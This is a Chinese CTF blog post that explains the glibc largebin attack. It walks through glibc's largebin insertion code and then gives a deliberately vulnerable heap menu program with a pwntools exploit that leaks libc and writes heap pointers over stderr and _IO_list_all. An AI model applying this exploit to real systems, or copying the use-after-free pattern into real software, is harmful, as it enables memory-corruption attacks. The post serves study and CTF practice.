【我的 PWN 学习手札】Largebin Attack(< glibc-2.30)

于 2024-09-18 18:37:00 发布
阅读量487 收藏 8
点赞数 8
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/142330217
版权

目录

前言

一、Largebin 的组织结构

(1)largebin 里放了单个 chunk

(2)largebin 里放了一组同样大小的 chunk 

(3)largebin 里放了多组不同大小的 chunk 

(4)重点关注和理解 

二、插入过程源码分析

三、攻击过程和效果 

四、测试与模板

前言

Largebin 与 smallbin unsortedbin 在组织结构上,除了通过 fd 和 bk 字段的双向链表组织,还存在fd_nextsize 和 bk_nextsize 字段。因此,当进行 free 或者 malloc 时,这些字段有着与此前不同的写逻辑。largebin attack 就是利用 largebin 的这一组织特性进行利用的。 

实现效果:能够在任意地址写堆地址(后期 hook 都被削去,往往通过构造IO_File来实现利用,Largebin Attack就是实现该利用的重要的前置手法)

一、Largebin 的组织结构

(1)largebin 里放了单个 chunk

(2)largebin 里放了一组同样大小的 chunk 

(3)largebin 里放了多组不同大小的 chunk 

(4)重点关注和理解 

        如果我们“擦去”所谓的 nextsize 指针,就会发现 largebin 中的 chunk 还是用 fd 和 bk 的双向链表组织的。

        然而每一个 largebin 所保存的 chunk 的 size 都是一个范围。largebin 的组织在内部是 fd 方向上 size 广义递减的(除了最后的 chunk),在 bk 方向上 size 是广义递增的(除了开头的 chunk)。

        既然 size 有序,完全没必要单个遍历,需要进行插入时也是依据合适的 size 找到插入的位置。为此用 fd_nextsize 来记录下一个更大 size 的 chunk,用 bk_nextsize 来记录上一个更小 size 的 chunk。

二、插入过程源码分析

// 从unsortedbin来,如果不插入smallbin
if (in_smallbin_range (size)){
    ...
// 则插入largebin
}else{
     // 找到对应size的largebin
     victim_index = largebin_index (size);
     bck = bin_at (av, victim_index);
     fwd = bck->fd;
     /* maintain large bins in sorted order */
     // largebin非空
     if (fwd != bck){
         /* Or with inuse bit to speed comparisons */
         size |= PREV_INUSE;
         /* if smaller than smallest, bypass loop below */
         assert (chunk_main_arena (bck->bk));
         // 特判,如果比最小的还小,则插入尾部
         if ((unsigned long) (size)
             < (unsigned long) chunksize_nomask (bck->bk)){
             ...
         // 否则将开始循环依据size找到合适的位置
         }else{
              assert (chunk_main_arena (fwd));
              while ((unsigned long) size < chunksize_nomask (fwd)){
                  fwd = fwd->fd_nextsize;
                  assert (chunk_main_arena (fwd));
              }
              // 如果已经有该size的free chunk,则插在该size chunk的第二个位置
              // 注意,fd_nextsize和bk_nextsize都不需要变动,这也是插入到第二个的原因
              if ((unsigned long) size
                    == (unsigned long) chunksize_nomask (fwd))
                  /* Always insert in the second position. */
                  fwd = fwd->fd;
              // 就是新的size,找到最近的大于该size/小于该size的free chunk的序列的第一个chunk
              else{
                  // 先对正在插入的chunk进行赋值,新插入chunk的两个nextsize已经指出去了
                  victim->fd_nextsize = fwd;
                  victim->bk_nextsize = fwd->bk_nextsize;
                  // 然后就是将原本连在一起的旧的链上的指针更新,指向新插入的chunk
                  fwd->bk_nextsize = victim;
                  victim->bk_nextsize->fd_nextsize = victim;
              }
              bck = fwd->bk;
         }
      }else
            victim->fd_nextsize = victim->bk_nextsize = victim;
}
// 刚刚进行的都是nextsize的变动,接下来进行fd和bk的变动
// 已经找到了插入位置,即插入到fwd和bck这两个chunk之间,这对于所有情况都是一样,因此这块代码通用
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;

三、攻击过程和效果 

利用插入过程中的指针操作,如果我们通过 UAF 将 largebin 中的 free chunk 的 bk 指针和 bk_nextsize 指针进行修改: 

那么在进行上述源码操作时,就会发生:

可以看到,两个地址都被写上了同一个堆指针,这就是largebin attack所能达成的效果。 

四、测试与模板

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>
 
char *chunk_list[0x100];
 
void menu() {
    puts("1. add chunk");
    puts("2. delete chunk");
    puts("3. edit chunk");
    puts("4. show chunk");
    puts("5. exit");
    puts("choice:");
}
 
int get_num() {
    char buf[0x10];
    read(0, buf, sizeof(buf));
    return atoi(buf);
}
 
void add_chunk() {
    puts("index:");
    int index = get_num();
    puts("size:");
    int size = get_num();
    chunk_list[index] = malloc(size);
}
 
void delete_chunk() {
    puts("index:");
    int index = get_num();
    free(chunk_list[index]);
}
 
void edit_chunk() {
    puts("index:");
    int index = get_num();
    puts("length:");
    int length = get_num();
    puts("content:");
    read(0, chunk_list[index], length);
}
 
void show_chunk() {
    puts("index:");
    int index = get_num();
    puts(chunk_list[index]);
}
 
int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
 
    while (1) {
        menu();
        switch (get_num()) {
            case 1:
                add_chunk();
                break;
            case 2:
                delete_chunk();
                break;
            case 3:
                edit_chunk();
                break;
            case 4:
                show_chunk();
                break;
            case 5:
                exit(0);
            default:
                puts("invalid choice.");
        }
    }
}
from pwn import *
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

# leak libc
add(0,0x400)
add(1,0x10)
add(2,0x410)
delete(0)
show(0)
libc_base=u64(io.recv(6).ljust(8,b'\x00'))+0x7c1ab1200000-0x7c1ab159bb78
libc.address=libc_base
success(hex(libc_base))

# largebin attack
add(3,0x500)
delete(2)
payload=b''
payload+=p64(0)
payload+=p64(libc.sym['stderr']-0x10)
payload+=p64(0)
payload+=p64(libc.sym['_IO_list_all']-0x20)
success(hex(libc.sym['_IO_list_all']))
success(hex(libc.sym['stderr']))
edit(0,0x20,payload)
add(3,0x500)
gdb.attach(io)
io.interactive()
Mr_Fmnwon
关注
CTF pwn题堆入门 -- Large bin
lifanxin的博客
04-07 1848
Large bin概述攻击方式分配堆到目的地址house of force总结 概述   large bin采用双链表结构,libc-2.23版本下64位机器上,最小为0x400(1024字节),里面的chunk从头结点的fd指针开始,按大小顺序排列。不同于fast bin, small bin, unsorted bin的结构,当属于large bin的chunk被释放时,chunk中还会有fd_nextsize和bk_nextsize指针,分别指向前后第一个与本身chunk大小不同的chunk。当然也就
pwn -- glibc-2.29漏洞利用学习
lifanxin的博客
04-30 592
glibc-2.29概述Tcache Stashing Unlink Attack任意位置写入较大值总结 概述   这里记录下版本为libc-2.29.so的漏洞利用方式,一是防止遗忘,二是供大家学习。 Tcache Stashing Unlink Attack   攻击原理和细节代码我就不分析了,着重记录下攻击方式和效果,这里利用tcache stashing unlink attack可以实现两种攻击效果:   1、任意位置写入较大值   2、任意地址chunk分配 任意位置写入较大值   该漏洞发生在
【我的 PWN 学习手札】Unsortedbin Attack
最新发布
Mr_Fmnwon的博客
09-16 497
Unsortedbin Attack不能说是一种getshell的方式,而只能说是一种利用手法。在glibc2.28之前有效,条件是存在uaf,效果是能在某一地址写一个大数(glibc上的一个地址)。
【我的 PWN 学习手札】Unlink Attack
Mr_Fmnwon的博客
09-13 1208
在除了fastbin、tcachebin的其他空闲堆块的管理bin中,如shortbinlargebin、unsortedbin,内部组织都是双向链表。如下图(示意图来自好好说话之unlink-CSDN博客当需要将second_chunk脱链时,使用unlink对second_chunk操作。不难看出,实际上是这样一个过程:我的上一个的下一个=我的下一个,我的下一个的上一个=我的上一个这样“我”就可以取出,因为链上已经没有指针指向“我”,即所谓的脱链。
好好说话之Large Bin Attack
hollk’s blog
01-20 4852
large bin attack这种方法本质上并不难,只是有点绕而已。他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不过large chunk还需要考虑fd_nextsize和bk_nextsize这两个结构。接下来就剩Tcache attack和House系列啦!终于要熬出头了???? 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
glibc-2.29 large bin attack 原理
qq_23066945的博客
11-14 1065
glibc-2.29 large bin attack 原理 原创: 星盟安全团队 星盟安全 该方法并非笔者发现,而是阅读 balsn 的 writeup 时分析而得到的,这里介绍一下这种攻击方法。 unsorted bin attack 在介绍新的攻击技术之前,先来缅怀一下 unsorted bin attack , 由于 glibc-2.29 新上的保护措施,使得 unsorted bin ...
Large Bin Attack 源码调试
yjh_fnu_ltn的博客
08-26 1073
how2heap 中也说了,large bin attack 是未来更深入的利用(在IO中利用其能写入堆地址)。现在我们来总结一下利用的条件:可以修改一个 large bin chunk 的 data从 unsorted bin 中来的 large bin chunk 要紧跟在被构造过的 chunk 的后面通过 large bin attack 可以辅助 Tcache Stash Unlink + 攻击(任意地址写入一个堆地址。
PWN】Unsorted binLarge binAttack
u014377094的博客
05-03 863
今天继续整理攻击方法,逆水行舟,不进则退。 Unsorted bin attackLarge bin attack两者我还是放在一起了,因为两者相近,都是通过修改bk(bk_nextsize)来实现对一块区域的修改,漏洞在于缺少*(bk)->fd的检测。 unsortedbin的利用点 /* remove from unsorted list */ if (__glibc_unlikely (bck->fd != victim))
pwn题切换不同glibc版本实测
csdn546229768的博客
01-28 3671
pwn题目到了堆题目就是和glibc打交道,所以系统默认的一个libc肯定是满足不了各种题目类型的需求的,刚开始学习pwn时就看别人文章说最好一起下载ubuntu16\ubuntu18没想明白是为什么,直到接触了堆题,哦~原来如此,不过因为我是将ubuntu20安装在了物理机上,所以就想办法给整合在一起了 看了网上大佬们的一些玩法,大概流程就是自己下载libc源码进行编译然后修改程序so文件路径,听起来简单,琢磨了一晚上终究还是没有编译出来,后来还是用下载源码+通过patchelf进行替换,试了下好像确实
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1583
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
glibc-2.29学习(上)
weixin_44145820的博客
05-28 1202
堆利用在CTF的PWN题目中一直占比较大,而最近的比赛的平台也逐渐从Ubuntu16,Ubuntu18向Ubuntu19甚至更高版本转移,为此学习一下libc-2.29中新的特性对做题还是很有帮助的 libc-2.29新变化 libc-2.29中修改了对tcache_entry的定义,通过注释我们也能看出新增加的key是为了检测double free的,如下 /* We overlay this structure on the user-data portion of a chunk when t
shader 案例学习笔记之将坐标系分成4个象限
localhost
09-13 244
坐标系被分成了4个单元格,每个单元格都有唯一的索引,后续就可以根据索引去渲染。
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
qq_44189622的博客
09-11 871
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
计算几何学习
网安小白
09-12 474
学习计算几何过程中对经典算法的记录
网络工程师学习笔记——网络互连与互联网
2301_77279557的博客
09-14 822
网络互连相关技术
Spring Framework 学习总结博客
2302_80084329的博客
09-13 1054
通过本文的学习,我们从Spring的核心架构入手,逐步理解了IoC和DI的概念,并通过代码示例掌握了如何在实际项目中使用这些技术。Spring通过IoC容器管理bean,依赖注入将bean之间的关系解耦,大大简化了复杂系统的开发过程。这些基本的Spring知识是理解其高级特性(如AOP、事务管理)的基础,掌握这些概念后,我们可以更加自如地使用Spring构建复杂的企业级应用。
看Threejs好玩示例,学习创新与技术(二)
htsitr2的专栏
09-14 519
它的主要特点是确保生成的点之间保持一定的最小距离,从而避免点的聚集。这种方法在计算机图形学、游戏开发、物理模拟等领域中非常有用,尤其是在需要生成自然分布的对象(如树木、石头等)时。如果不进行裁剪,那么效果如下(初步的锯齿感是因为矩形内采样的结果)。为啥这么复杂呢,为啥不开始存储每个方块的UV呢?下面代码的vTexCoords(=savedModelMatrix,已修改)记录方块所在的位置,vWorldPosition表示方块中像素的偏移。在上面那副图中,聪明的你一定初步猜到了每个方块的纹理是怎么得到的。
学习pwn需要学习哪些数学知识
05-18
学习 pwn 通常需要掌握以下数学知识: 1. 二进制和十六进制:pwn 题目通常会给出二进制或十六进制的数据,因此需要熟悉这两种进制的转换和计算。 2. 离散数学:离散数学是计算机科学中的一门重要课程,它涉及到许多 pwn 中用到的算法和数据结构,例如哈希表、图论、组合数学等。 3. 模运算:在 pwn 中,模运算经常被用来处理加密算法或者防止整数溢出等问题。 4. 基础数论:pwn 题目中经常涉及到素数、欧拉函数、费马小定理等基础数论概念,因此需要对这些内容有一定的了解。 5. 线性代数:在 pwn 中,矩阵运算和向量运算经常被用来解决密码学和加密算法相关的问题,因此需要对线性代数有一定的了解。 当然,不同的 pwn 题目可能需要的数学知识也会有所不同,但以上几个方面是比较基础和常见的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值